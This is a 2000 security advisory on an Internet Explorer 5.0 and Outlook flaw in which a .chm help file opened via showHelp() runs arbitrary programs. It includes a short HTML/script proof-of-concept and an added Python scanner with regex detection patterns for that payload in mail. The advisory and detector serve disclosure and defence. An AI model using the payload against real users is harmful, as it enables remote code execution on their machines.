IE and Outlook May Run Arbitrary Code

Reported March 14, 2000 by Georgi Guninski

VERSIONS AFFECTED

  • Internet Explorer 5.0, Outlook

DESCRIPTION

Georgi discovered that a user could place a .chm (compiled HTML Help) file in the TEMP directory, and that the file could contain a "shortcut" command. When the file is opened with the showHelp() method, any programs listed in it could be executed by the operating system.

DEMONSTRATION

Such a problem could be used to launch an attack against an unsuspecting user of Outlook. Code similar to the following may cause a program to run on a remote desktop.

<IFRAME align=baseline alt="" border=0 hspace=0 src="cid:000701bf8458$eb570380$dc0732d4@bbb"></IFRAME>
<SCRIPT>
setTimeout('window.showHelp("c:/windows/temp/abcde.chm");',1000);
setTimeout('window.showHelp("c:/temp/abcde.chm");',1000);
</SCRIPT>
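
A defensive check for the pattern shown above, as an added example that is not part of the original advisory: it decodes every text/html part of a mail message (quoted-printable included) and reports showHelp() calls that point at a .chm on a local path, plus any frame whose source is a cid: part. The sample message, its addresses and the function names are constructed for illustration.

```python
import email
import re
from email import policy

# showHelp() aimed at a .chm on a local drive or file: URL (http help URLs are not matched).
SHOWHELP_LOCAL = re.compile(
    r"""showHelp\s*\(\s*["']((?:[a-z]:[\\/]|file:)[^"']*\.chm)""", re.I)
# Frame whose source is a cid: reference, i.e. another MIME part of the same message.
CID_FRAME = re.compile(r"""<i?frame\b[^>]*\bsrc\s*=\s*["']?cid:""", re.I)


def scan_message(raw: bytes) -> dict:
    """Return showHelp()/.chm findings for every text/html part of a raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {"chm_paths": [], "cid_frame": False}
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()  # transfer encoding (quoted-printable, base64) is undone here
        findings["chm_paths"] += SHOWHELP_LOCAL.findall(html)
        findings["cid_frame"] |= bool(CID_FRAME.search(html))
    return findings


# Constructed sample: a quoted-printable HTML body shaped like the snippet in this advisory.
SAMPLE = (
    b"From: a@example.test\r\n"
    b"To: b@example.test\r\n"
    b"Subject: constructed sample\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n"
    b"\r\n"
    b"<IFRAME align=3Dbaseline alt=3D\"\" border=3D0 hspace=3D0=20\r\n"
    b"src=3D\"cid:part1@example.test\"></IFRAME>\r\n"
    b"<SCRIPT>\r\n"
    b"setTimeout('window.showHelp(\"c:/windows/temp/abcde.chm\");',1000);\r\n"
    b"</SCRIPT>\r\n"
)

if __name__ == "__main__":
    print(scan_message(SAMPLE))
```

Matching on the decoded body matters: a filter that greps the raw message for `src="cid:` would miss the `=3D` form used in the transfer encoding.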

VENDOR RESPONSE

Microsoft is aware of this issue; however, no response was known at the time of this writing.

CREDITS

Discovered by Georgi Guninski